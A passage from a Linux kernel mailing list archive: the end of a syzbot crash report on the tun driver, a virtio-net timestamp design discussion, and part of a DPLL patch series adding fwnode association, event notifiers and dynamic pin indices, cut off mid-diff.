CR2: 00007f08c4448ff8 CR3: 000000010cec2000 CR4: 00000000000006f0
Call Trace:
 <TASK>
 copy_overflow include/linux/ucopysize.h:41 [inline]
 check_copy_size include/linux/ucopysize.h:50 [inline]
 copy_to_iter include/linux/uio.h:219 [inline]
 tun_put_user drivers/net/tun.c:2089 [inline]
 tun_do_read+0x1f44/0x28a0 drivers/net/tun.c:2190
 tun_chr_read_iter+0x13b/0x260 drivers/net/tun.c:2214
 do_iter_readv_writev+0x619/0x8c0 fs/read_write.c:-1
 vfs_readv+0x288/0x840 fs/read_write.c:1018
 do_readv+0x154/0x2e0 fs/read_write.c:1080
 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
 do_syscall_64+0xe2/0xf80 arch/x86/entry/syscall_64.c:94
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f08c359acb9
Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f08c446a028 EFLAGS: 00000246 ORIG_RAX: 0000000000000013
RAX: ffffffffffffffda RBX: 00007f08c3815fa0 RCX: 00007f08c359acb9
RDX: 0000000000000002 RSI: 0000200000000080 RDI: 0000000000000003
RBP: 00007f08c3608bf7 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 00007f08c3816038 R14: 00007f08c3815fa0 R15: 00007fff6491da78
 </TASK>
----------------
Code disassembly (best guess):
   0: 90                      nop
   1: 90                      nop
   2: 90                      nop
   3: 90                      nop
   4: 90                      nop
   5: 90                      nop
   6: 90                      nop
   7: 90                      nop
   8: 90                      nop
   9: 90                      nop
   a: 90                      nop
   b: 90                      nop
   c: 90                      nop
   d: 90                      nop
   e: f3 0f 1e fa             endbr64
  12: 55                      push %rbp
  13: 53                      push %rbx
  14: 48 89 f3                mov %rsi,%rbx
  17: 89 fd                   mov %edi,%ebp
  19: e8 60 b1 c4 ff          call 0xffc4b17e
  1e: 48 8d 3d 39 25 d5 0d    lea 0xdd52539(%rip),%rdi # 0xdd5255e
  25: 89 ee                   mov %ebp,%esi
  27: 48 89 da                mov %rbx,%rdx
* 2a: 67 48 0f b9 3a          ud1 (%edx),%rdi <-- trapping instruction
  2f: 5b                      pop %rbx
  30: 5d                      pop %rbp
  31: c3                      ret
  32: cc                      int3
  33: cc                      int3
  34: cc                      int3
  35: cc                      int3
  36: cc                      int3
  37: cc                      int3
  38: cc                      int3
  39: cc                      int3
  3a: cc                      int3
  3b: cc                      int3
  3c: cc                      int3
  3d: cc                      int3
  3e: 90                      nop
  3f: 90                      nop

***

If these findings have caused you to resend the series or submit a separate fix,
please add the following tag to your commit message:
Tested-by: syzbot@syzkaller.appspotmail.com

---
This report is generated by a bot. It may contain errors.
syzbot ci engineers can be reached at syzkaller@googlegroups.com.
{ "author": "syzbot ci <syzbot+ci99a227ab2089b0fa@syzkaller.appspotmail.com>", "date": "Thu, 29 Jan 2026 05:27:03 -0800", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
Steffen Trumtrar wrote: Good to see this picked up. I would also still like to see support for HW timestamp pass-through in virtio-net.
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Sun, 01 Feb 2026 16:00:07 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
Steffen Trumtrar wrote: This patch refers to a struct that does not exist yet, so this cannot compile?
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Sun, 01 Feb 2026 16:00:49 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
Steffen Trumtrar wrote: Jason, Michael: creating a new struct for every field is not very elegant. Is it time to find a more forward looking approach to expanding with new fields? Like a TLV, or how netlink structs like tcp_info are extended with support for legacy users that only use a truncated struct? It's fine to implement filters, but also fine to only support ALL or NONE for simplicity. In the end it probably depends on what the underlying physical device supports. Why the multiple fields, rather than u64. More broadly: can my old patchset be dusted off as is. Does it require significant changes? I only paused it at the time, because I did not have a real device back-end that was going to support it.
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Sun, 01 Feb 2026 16:05:54 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
On 2026-02-01 at 16:05 -05, Willem de Bruijn <willemdebruijn.kernel@gmail.com> wrote: Yes, this gets complicated real fast and leads to really long calls for all the nested fields. If there is a different way, I'd prefer that. Should have added a comment, but this is based on this patch c3838262b824c71c145cd3668722e99a69bc9cd9 virtio_net: fix alignment for virtio_net_hdr_v1_hash Changing alignment of header would mean it's no longer safe to cast a 2 byte aligned pointer between formats. Use two 16 bit fields to make it 2 byte aligned as previously. This is the dusted off version ;) With the flow filter it should be possible to turn the timestamps on and off during runtime. Best regards, Steffen -- Pengutronix e.K. | Dipl.-Inform. Steffen Trumtrar | Steuerwalder Str. 21 | https://www.pengutronix.de/ | 31137 Hildesheim, Germany | Phone: +49-5121-206917-0 | Amtsgericht Hildesheim, HRA 2686| Fax: +49-5121-206917-5555 |
{ "author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>", "date": "Mon, 02 Feb 2026 08:34:58 +0100", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
On Sun, Feb 01, 2026 at 04:05:54PM -0500, Willem de Bruijn wrote: I certainly wouldn't mind, though I suspect tlv is too complex as hardware implementations can't efficiently follow linked lists. I'll try to ping some hardware designers for what works well for offloads.
{ "author": "\"Michael S. Tsirkin\" <mst@redhat.com>", "date": "Mon, 2 Feb 2026 02:59:31 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
Michael S. Tsirkin wrote: Great thanks. Agreed that TLV was probably the wrong suggestion. We can definitely have a required order of fields. My initial thought is as said like many user/kernel structures: where both sides agree on the basic order of the struct, and pass along the length, so that they agree only to process the min of both their supported lengths. New fields are added at the tail of the struct. See for instance getsockopt TCP_INFO.
{ "author": "Willem de Bruijn <willemdebruijn.kernel@gmail.com>", "date": "Mon, 02 Feb 2026 12:40:36 -0500", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the
Intel E825-C Ethernet controller. Unlike previous generations where
DPLL connections were implicitly assumed, the E825-C architecture
relies on the platform firmware (ACPI) to describe the physical
connections between the Ethernet controller and external DPLLs (such
as the ZL3073x).

To accommodate this, the series extends the DPLL subsystem to support
firmware node (fwnode) associations, asynchronous discovery via
notifiers, and dynamic pin management. Additionally, a significant
refactor of the DPLL reference counting logic is included to ensure
robustness and debuggability.

DPLL Core Extensions:
* Firmware Node Association: Pins can now be associated with a struct
  fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows
  drivers to link pin objects with their corresponding DT/ACPI nodes.
* Asynchronous Notifiers: A raw notifier chain is added to the DPLL
  core. This allows the Ethernet driver to subscribe to events and
  react when the platform DPLL driver registers the parent pins,
  resolving probe ordering dependencies.
* Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have
  the core automatically allocate a unique pin index.

Reference Counting & Debugging:
* Refactor: The reference counting logic in the core is consolidated.
  Internal list management helpers now automatically handle hold/put
  operations, removing fragile open-coded logic in the registration
  paths.
* Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is
  added. This allows developers to instrument and debug reference leaks
  by recording stack traces for every get/put operation.

Driver Updates:
* zl3073x: Updated to associate pins with fwnode handles using the new
  setter and support the 'mux' pin type.
* ice: Implements the E825-C specific hardware configuration for SyncE
  (CGU registers). It utilizes the new notifier and fwnode APIs to
  dynamically discover and attach to the platform DPLLs.
Patch Summary:
Patch 1:   DPLL Core (fwnode association).
Patch 2:   Driver zl3073x (Set fwnode).
Patch 3-4: DPLL Core (Notifiers and dynamic IDs).
Patch 5:   Driver zl3073x (Mux type).
Patch 6:   DPLL Core (Refcount refactor).
Patch 7-8: Refcount tracking infrastructure and driver updates.
Patch 9:   Driver ice (E825-C SyncE logic).

Changes in v4:
* Fixed documentation and function stub issues found by AI

Arkadiusz Kubalewski (1):
  ice: dpll: Support E825-C SyncE and dynamic pin discovery

Ivan Vecera (7):
  dpll: Allow associating dpll pin with a firmware node
  dpll: zl3073x: Associate pin with fwnode handle
  dpll: Support dynamic pin index allocation
  dpll: zl3073x: Add support for mux pin type
  dpll: Enhance and consolidate reference counting logic
  dpll: Add reference count tracking support
  drivers: Add support for DPLL reference count tracking

Petr Oros (1):
  dpll: Add notifier chain for dpll events

 drivers/dpll/Kconfig                        |  15 +
 drivers/dpll/dpll_core.c                    | 288 ++++++-
 drivers/dpll/dpll_core.h                    |  11 +
 drivers/dpll/dpll_netlink.c                 |   6 +
 drivers/dpll/zl3073x/dpll.c                 |  15 +-
 drivers/dpll/zl3073x/dpll.h                 |   2 +
 drivers/dpll/zl3073x/prop.c                 |   2 +
 drivers/net/ethernet/intel/ice/ice_dpll.c   | 755 +++++++++++++++---
 drivers/net/ethernet/intel/ice/ice_dpll.h   |  30 +
 drivers/net/ethernet/intel/ice/ice_lib.c    |   3 +
 drivers/net/ethernet/intel/ice/ice_ptp.c    |  32 +
 drivers/net/ethernet/intel/ice/ice_ptp_hw.c |   9 +-
 drivers/net/ethernet/intel/ice/ice_tspll.c  | 217 +++++
 drivers/net/ethernet/intel/ice/ice_tspll.h  |  13 +-
 drivers/net/ethernet/intel/ice/ice_type.h   |   6 +
 .../net/ethernet/mellanox/mlx5/core/dpll.c  |  16 +-
 drivers/ptp/ptp_ocp.c                       |  18 +-
 include/linux/dpll.h                        |  59 +-
 18 files changed, 1347 insertions(+), 150 deletions(-)

-- 
2.52.0
Extend the DPLL core to support associating a DPLL pin with a firmware
node. This association is required to allow other subsystems (such as
network drivers) to locate and request specific DPLL pins defined in
the Device Tree or ACPI.

* Add a .fwnode field to the struct dpll_pin
* Introduce dpll_pin_fwnode_set() helper to allow the provider driver
  to associate a pin with a fwnode after the pin has been allocated
* Introduce fwnode_dpll_pin_find() helper to allow consumers to search
  for a registered DPLL pin using its associated fwnode handle
* Ensure the fwnode reference is properly released in dpll_pin_put()

Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
Reviewed-by: Vadim Fedorenko <vadim.fedorenko@linux.dev>
Signed-off-by: Ivan Vecera <ivecera@redhat.com>
---
v4:
* fixed fwnode_dpll_pin_find() return value description
---
 drivers/dpll/dpll_core.c | 49 ++++++++++++++++++++++++++++++++++++++
 drivers/dpll/dpll_core.h |  2 ++
 include/linux/dpll.h     | 11 +++++++++
 3 files changed, 62 insertions(+)

diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c
index 8879a72351561..f04ed7195cadd 100644
--- a/drivers/dpll/dpll_core.c
+++ b/drivers/dpll/dpll_core.c
@@ -10,6 +10,7 @@
 #include <linux/device.h>
 #include <linux/err.h>
+#include <linux/property.h>
 #include <linux/slab.h>
 #include <linux/string.h>
@@ -595,12 +596,60 @@ void dpll_pin_put(struct dpll_pin *pin)
 		xa_destroy(&pin->parent_refs);
 		xa_destroy(&pin->ref_sync_pins);
 		dpll_pin_prop_free(&pin->prop);
+		fwnode_handle_put(pin->fwnode);
 		kfree_rcu(pin, rcu);
 	}
 	mutex_unlock(&dpll_lock);
 }
 EXPORT_SYMBOL_GPL(dpll_pin_put);
 
+/**
+ * dpll_pin_fwnode_set - set dpll pin firmware node reference
+ * @pin: pointer to a dpll pin
+ * @fwnode: firmware node handle
+ *
+ * Set firmware node handle for the given dpll pin.
+ */
+void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode)
+{
+	mutex_lock(&dpll_lock);
+	fwnode_handle_put(pin->fwnode); /* Drop fwnode previously set */
+	pin->fwnode = fwnode_handle_get(fwnode);
+	mutex_unlock(&dpll_lock);
+}
+EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set);
+
+/**
+ * fwnode_dpll_pin_find - find dpll pin by firmware node reference
+ * @fwnode: reference to firmware node
+ *
+ * Get existing object of a pin that is associated with given firmware node
+ * reference.
+ *
+ * Context: Acquires a lock (dpll_lock)
+ * Return:
+ * * valid dpll_pin pointer on success
+ * * NULL when no such pin exists
+ */
+struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode)
+{
+	struct dpll_pin *pin, *ret = NULL;
+	unsigned long index;
+
+	mutex_lock(&dpll_lock);
+	xa_for_each(&dpll_pin_xa, index, pin) {
+		if (pin->fwnode == fwnode) {
+			ret = pin;
+			refcount_inc(&ret->refcount);
+			break;
+		}
+	}
+	mutex_unlock(&dpll_lock);
+
+	return ret;
+}
+EXPORT_SYMBOL_GPL(fwnode_dpll_pin_find);
+
 static int
 __dpll_pin_register(struct dpll_device *dpll, struct dpll_pin *pin,
		    const struct dpll_pin_ops *ops, void *priv, void *cookie)
diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h
index 8ce969bbeb64e..d3e17ff0ecef0 100644
--- a/drivers/dpll/dpll_core.h
+++ b/drivers/dpll/dpll_core.h
@@ -42,6 +42,7 @@ struct dpll_device {
  * @pin_idx: index of a pin given by dev driver
  * @clock_id: clock_id of creator
  * @module: module of creator
+ * @fwnode: optional reference to firmware node
  * @dpll_refs: hold referencees to dplls pin was registered with
  * @parent_refs: hold references to parent pins pin was registered with
  * @ref_sync_pins: hold references to pins for Reference SYNC feature
@@ -54,6 +55,7 @@ struct dpll_pin {
 	u32 pin_idx;
 	u64 clock_id;
 	struct module *module;
+	struct fwnode_handle *fwnode;
 	struct xarray dpll_refs;
 	struct xarray parent_refs;
 	struct xarray ref_sync_pins;
diff --git a/include/linux/dpll.h b/include/linux/dpll.h
index c6d0248fa5273..f2e8660e90cdf 100644
--- a/include/linux/dpll.h
+++ b/include/linux/dpll.h
@@ -16,6 +16,7 @@
 struct dpll_device;
 struct dpll_pin;
 struct dpll_pin_esync;
+struct fwnode_handle;
 
 struct dpll_device_ops {
 	int (*mode_get)(const struct dpll_device *dpll, void *dpll_priv,
@@ -178,6 +179,8 @@ void dpll_netdev_pin_clear(struct net_device *dev);
 size_t dpll_netdev_pin_handle_size(const struct net_device *dev);
 int dpll_netdev_add_pin_handle(struct sk_buff *msg,
			       const struct net_device *dev);
+
+struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode);
 #else
 static inline void
 dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin) { }
@@ -193,6 +196,12 @@
 dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev)
 {
 	return 0;
 }
+
+static inline struct dpll_pin *
+fwnode_dpll_pin_find(struct fwnode_handle *fwnode)
+{
+	return NULL;
+}
 #endif
 
 struct dpll_device *
@@ -218,6 +227,8 @@ void dpll_pin_unregister(struct dpll_device *dpll, struct dpll_pin *pin,
 
 void dpll_pin_put(struct dpll_pin *pin);
 
+void dpll_pin_fwnode_set(struct dpll_pin *pin, struct fwnode_handle *fwnode);
+
 int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin,
			     const struct dpll_pin_ops *ops, void *priv);
-- 
2.52.0
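A consumer of the two new helpers might look roughly like the sketch
below. This is a non-buildable illustration, not code from this series:
the "dplls" reference name, the surrounding driver context, and the
error handling are assumptions:

```
	/* Resolve the pin a firmware reference points at; the find takes
	 * a reference that must be dropped with dpll_pin_put() when done.
	 */
	struct fwnode_handle *ref;
	struct dpll_pin *pin;

	ref = fwnode_find_reference(dev_fwnode(dev), "dplls", 0);
	if (IS_ERR(ref))
		return PTR_ERR(ref);

	pin = fwnode_dpll_pin_find(ref);
	fwnode_handle_put(ref);
	if (!pin)
		return -EPROBE_DEFER;	/* provider not registered yet */

	/* ... use the pin ... */

	dpll_pin_put(pin);
```

Returning -EPROBE_DEFER when the pin is not yet registered is one way
to cope with probe ordering; the notifier chain added later in this
series is the other.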
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:30 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
Associate the registered DPLL pin with its firmware node by calling
dpll_pin_fwnode_set(). This links the created pin object to its
corresponding DT/ACPI node in the DPLL core. Consequently, this
enables consumer drivers (such as network drivers) to locate and
request this specific pin using the fwnode_dpll_pin_find() helper.

Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
Signed-off-by: Ivan Vecera <ivecera@redhat.com>
---
 drivers/dpll/zl3073x/dpll.c | 1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c
index 7d8ed948b9706..9eed21088adac 100644
--- a/drivers/dpll/zl3073x/dpll.c
+++ b/drivers/dpll/zl3073x/dpll.c
@@ -1485,6 +1485,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index)
		rc = PTR_ERR(pin->dpll_pin);
		goto err_pin_get;
	}
+	dpll_pin_fwnode_set(pin->dpll_pin, props->fwnode);
 
	if (zl3073x_dpll_is_input_pin(pin))
		ops = &zl3073x_dpll_input_pin_ops;
-- 
2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:31 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
From: Petr Oros <poros@redhat.com>

Currently, the DPLL subsystem reports events (creation, deletion,
changes) to userspace via Netlink. However, there is no mechanism for
other kernel components to be notified of these events directly.

Add a raw notifier chain to the DPLL core protected by dpll_lock. This
allows other kernel subsystems or drivers to register callbacks and
receive notifications when DPLL devices or pins are created, deleted,
or modified.

Define the following:
- Registration helpers: {,un}register_dpll_notifier()
- Event types: DPLL_DEVICE_CREATED, DPLL_PIN_CREATED, etc.
- Context structures: dpll_{device,pin}_notifier_info to pass relevant
  data to the listeners.

The notification chain is invoked alongside the existing Netlink event
generation to ensure in-kernel listeners are kept in sync with the
subsystem state.

Reviewed-by: Vadim Fedorenko <vadim.fedorenko@linux.dev>
Co-developed-by: Ivan Vecera <ivecera@redhat.com>
Signed-off-by: Ivan Vecera <ivecera@redhat.com>
Signed-off-by: Petr Oros <poros@redhat.com>
---
 drivers/dpll/dpll_core.c    | 57 +++++++++++++++++++++++++++++++++++++
 drivers/dpll/dpll_core.h    |  4 +++
 drivers/dpll/dpll_netlink.c |  6 ++++
 include/linux/dpll.h        | 29 +++++++++++++++++++
 4 files changed, 96 insertions(+)

diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c
index f04ed7195cadd..b05fe2ba46d91 100644
--- a/drivers/dpll/dpll_core.c
+++ b/drivers/dpll/dpll_core.c
@@ -23,6 +23,8 @@
 DEFINE_MUTEX(dpll_lock);
 DEFINE_XARRAY_FLAGS(dpll_device_xa, XA_FLAGS_ALLOC);
 DEFINE_XARRAY_FLAGS(dpll_pin_xa, XA_FLAGS_ALLOC);
 
+static RAW_NOTIFIER_HEAD(dpll_notifier_chain);
+
 static u32 dpll_device_xa_id;
 static u32 dpll_pin_xa_id;
@@ -46,6 +48,39 @@ struct dpll_pin_registration {
	void *cookie;
 };
 
+static int call_dpll_notifiers(unsigned long action, void *info)
+{
+	lockdep_assert_held(&dpll_lock);
+	return raw_notifier_call_chain(&dpll_notifier_chain, action, info);
+}
+
+void dpll_device_notify(struct dpll_device *dpll, unsigned long action)
+{
+	struct dpll_device_notifier_info info = {
+		.dpll = dpll,
+		.id = dpll->id,
+		.idx = dpll->device_idx,
+		.clock_id = dpll->clock_id,
+		.type = dpll->type,
+	};
+
+	call_dpll_notifiers(action, &info);
+}
+
+void dpll_pin_notify(struct dpll_pin *pin, unsigned long action)
+{
+	struct dpll_pin_notifier_info info = {
+		.pin = pin,
+		.id = pin->id,
+		.idx = pin->pin_idx,
+		.clock_id = pin->clock_id,
+		.fwnode = pin->fwnode,
+		.prop = &pin->prop,
+	};
+
+	call_dpll_notifiers(action, &info);
+}
+
 struct dpll_device *dpll_device_get_by_id(int id)
 {
	if (xa_get_mark(&dpll_device_xa, id, DPLL_REGISTERED))
@@ -539,6 +574,28 @@ void dpll_netdev_pin_clear(struct net_device *dev)
 }
 EXPORT_SYMBOL(dpll_netdev_pin_clear);
 
+int register_dpll_notifier(struct notifier_block *nb)
+{
+	int ret;
+
+	mutex_lock(&dpll_lock);
+	ret = raw_notifier_chain_register(&dpll_notifier_chain, nb);
+	mutex_unlock(&dpll_lock);
+	return ret;
+}
+EXPORT_SYMBOL_GPL(register_dpll_notifier);
+
+int unregister_dpll_notifier(struct notifier_block *nb)
+{
+	int ret;
+
+	mutex_lock(&dpll_lock);
+	ret = raw_notifier_chain_unregister(&dpll_notifier_chain, nb);
+	mutex_unlock(&dpll_lock);
+	return ret;
+}
+EXPORT_SYMBOL_GPL(unregister_dpll_notifier);
+
 /**
  * dpll_pin_get - find existing or create new dpll pin
  * @clock_id: clock_id of creator
diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h
index d3e17ff0ecef0..b7b4bb251f739 100644
--- a/drivers/dpll/dpll_core.h
+++ b/drivers/dpll/dpll_core.h
@@ -91,4 +91,8 @@ struct dpll_pin_ref *dpll_xa_ref_dpll_first(struct xarray *xa_refs);
 extern struct xarray dpll_device_xa;
 extern struct xarray dpll_pin_xa;
 extern struct mutex dpll_lock;
+
+void dpll_device_notify(struct dpll_device *dpll, unsigned long action);
+void dpll_pin_notify(struct dpll_pin *pin, unsigned long action);
+
 #endif
diff --git a/drivers/dpll/dpll_netlink.c b/drivers/dpll/dpll_netlink.c
index 904199ddd1781..83cbd64abf5a4 100644
--- a/drivers/dpll/dpll_netlink.c
+++ b/drivers/dpll/dpll_netlink.c
@@ -761,17 +761,20 @@ dpll_device_event_send(enum dpll_cmd event, struct dpll_device *dpll)
 int dpll_device_create_ntf(struct dpll_device *dpll)
 {
+	dpll_device_notify(dpll, DPLL_DEVICE_CREATED);
	return dpll_device_event_send(DPLL_CMD_DEVICE_CREATE_NTF, dpll);
 }
 
 int dpll_device_delete_ntf(struct dpll_device *dpll)
 {
+	dpll_device_notify(dpll, DPLL_DEVICE_DELETED);
	return dpll_device_event_send(DPLL_CMD_DEVICE_DELETE_NTF, dpll);
 }
 
 static int
 __dpll_device_change_ntf(struct dpll_device *dpll)
 {
+	dpll_device_notify(dpll, DPLL_DEVICE_CHANGED);
	return dpll_device_event_send(DPLL_CMD_DEVICE_CHANGE_NTF, dpll);
 }
@@ -829,16 +832,19 @@ dpll_pin_event_send(enum dpll_cmd event, struct dpll_pin *pin)
 int dpll_pin_create_ntf(struct dpll_pin *pin)
 {
+	dpll_pin_notify(pin, DPLL_PIN_CREATED);
	return dpll_pin_event_send(DPLL_CMD_PIN_CREATE_NTF, pin);
 }
 
 int dpll_pin_delete_ntf(struct dpll_pin *pin)
 {
+	dpll_pin_notify(pin, DPLL_PIN_DELETED);
	return dpll_pin_event_send(DPLL_CMD_PIN_DELETE_NTF, pin);
 }
 
 int __dpll_pin_change_ntf(struct dpll_pin *pin)
 {
+	dpll_pin_notify(pin, DPLL_PIN_CHANGED);
	return dpll_pin_event_send(DPLL_CMD_PIN_CHANGE_NTF, pin);
 }
diff --git a/include/linux/dpll.h b/include/linux/dpll.h
index f2e8660e90cdf..8ed90dfc65f05 100644
--- a/include/linux/dpll.h
+++ b/include/linux/dpll.h
@@ -11,6 +11,7 @@
 #include <linux/device.h>
 #include <linux/netlink.h>
 #include <linux/netdevice.h>
+#include <linux/notifier.h>
 #include <linux/rtnetlink.h>
 
 struct dpll_device;
@@ -172,6 +173,30 @@ struct dpll_pin_properties {
	u32 phase_gran;
 };
 
+#define DPLL_DEVICE_CREATED	1
+#define DPLL_DEVICE_DELETED	2
+#define DPLL_DEVICE_CHANGED	3
+#define DPLL_PIN_CREATED	4
+#define DPLL_PIN_DELETED	5
+#define DPLL_PIN_CHANGED	6
+
+struct dpll_device_notifier_info {
+	struct dpll_device *dpll;
+	u32 id;
+	u32 idx;
+	u64 clock_id;
+	enum dpll_type type;
+};
+
+struct dpll_pin_notifier_info {
+	struct dpll_pin *pin;
+	u32 id;
+	u32 idx;
+	u64 clock_id;
+	const struct fwnode_handle *fwnode;
+	const struct dpll_pin_properties *prop;
+};
+
 #if IS_ENABLED(CONFIG_DPLL)
 void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin);
 void dpll_netdev_pin_clear(struct net_device *dev);
@@ -242,4 +267,8 @@
 int dpll_device_change_ntf(struct dpll_device *dpll);
 
 int dpll_pin_change_ntf(struct dpll_pin *pin);
 
+int register_dpll_notifier(struct notifier_block *nb);
+
+int unregister_dpll_notifier(struct notifier_block *nb);
+
 #endif
-- 
2.52.0
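An in-kernel listener might hook into the chain roughly as follows.
This is a non-buildable sketch; the callback name, the matching logic,
and the probe/remove placement are illustrative assumptions:

```
	/* Hypothetical listener reacting to pin registration. */
	static int my_dpll_event(struct notifier_block *nb,
				 unsigned long action, void *data)
	{
		struct dpll_pin_notifier_info *info;

		switch (action) {
		case DPLL_PIN_CREATED:
			info = data;
			/* E.g. match info->fwnode against the firmware
			 * reference we are waiting for, then attach.
			 */
			break;
		case DPLL_PIN_DELETED:
			/* Drop our use of the pin. */
			break;
		}
		return NOTIFY_DONE;
	}

	static struct notifier_block my_dpll_nb = {
		.notifier_call = my_dpll_event,
	};

	/* In probe: */
	ret = register_dpll_notifier(&my_dpll_nb);
	/* In remove: */
	unregister_dpll_notifier(&my_dpll_nb);
```

Because the chain is called under dpll_lock, the callback must not call
back into DPLL API that takes the same lock.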
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:32 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
Allow drivers to register DPLL pins without manually specifying a pin
index.

Currently, drivers must provide a unique pin index when calling
dpll_pin_get(). This works well for hardware-mapped pins but creates
friction for drivers handling virtual pins or those without a strict
hardware indexing scheme.

Introduce DPLL_PIN_IDX_UNSPEC (U32_MAX). When a driver passes this
value as the pin index:
1. The core allocates a unique index using an IDA
2. The allocated index is mapped to a range starting above INT_MAX

This separation ensures that dynamically allocated indices never
collide with standard driver-provided hardware indices, which are
assumed to be within the 0 to INT_MAX range. The index is automatically
freed when the pin is released in dpll_pin_put().

Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
Signed-off-by: Ivan Vecera <ivecera@redhat.com>
---
v2:
* fixed integer overflow in dpll_pin_idx_free()
---
 drivers/dpll/dpll_core.c | 48 ++++++++++++++++++++++++++++++++++++++--
 include/linux/dpll.h     |  2 ++
 2 files changed, 48 insertions(+), 2 deletions(-)

diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c
index b05fe2ba46d91..59081cf2c73ae 100644
--- a/drivers/dpll/dpll_core.c
+++ b/drivers/dpll/dpll_core.c
@@ -10,6 +10,7 @@
 #include <linux/device.h>
 #include <linux/err.h>
+#include <linux/idr.h>
 #include <linux/property.h>
 #include <linux/slab.h>
 #include <linux/string.h>
@@ -24,6 +25,7 @@
 DEFINE_XARRAY_FLAGS(dpll_device_xa, XA_FLAGS_ALLOC);
 DEFINE_XARRAY_FLAGS(dpll_pin_xa, XA_FLAGS_ALLOC);
 
 static RAW_NOTIFIER_HEAD(dpll_notifier_chain);
+static DEFINE_IDA(dpll_pin_idx_ida);
 
 static u32 dpll_device_xa_id;
 static u32 dpll_pin_xa_id;
@@ -464,6 +466,36 @@ void dpll_device_unregister(struct dpll_device *dpll,
 }
 EXPORT_SYMBOL_GPL(dpll_device_unregister);
 
+static int dpll_pin_idx_alloc(u32 *pin_idx)
+{
+	int ret;
+
+	if (!pin_idx)
+		return -EINVAL;
+
+	/* Alloc unique number from IDA. Number belongs to <0, INT_MAX> range */
+	ret = ida_alloc(&dpll_pin_idx_ida, GFP_KERNEL);
+	if (ret < 0)
+		return ret;
+
+	/* Map the value to dynamic pin index range <INT_MAX+1, U32_MAX> */
+	*pin_idx = (u32)ret + INT_MAX + 1;
+
+	return 0;
+}
+
+static void dpll_pin_idx_free(u32 pin_idx)
+{
+	if (pin_idx <= INT_MAX)
+		return; /* Not a dynamic pin index */
+
+	/* Map the index value from dynamic pin index range to IDA range and
+	 * free it.
+	 */
+	pin_idx -= (u32)INT_MAX + 1;
+	ida_free(&dpll_pin_idx_ida, pin_idx);
+}
+
 static void dpll_pin_prop_free(struct dpll_pin_properties *prop)
 {
	kfree(prop->package_label);
@@ -521,9 +553,18 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module,
	struct dpll_pin *pin;
	int ret;
 
+	if (pin_idx == DPLL_PIN_IDX_UNSPEC) {
+		ret = dpll_pin_idx_alloc(&pin_idx);
+		if (ret)
+			return ERR_PTR(ret);
+	} else if (pin_idx > INT_MAX) {
+		return ERR_PTR(-EINVAL);
+	}
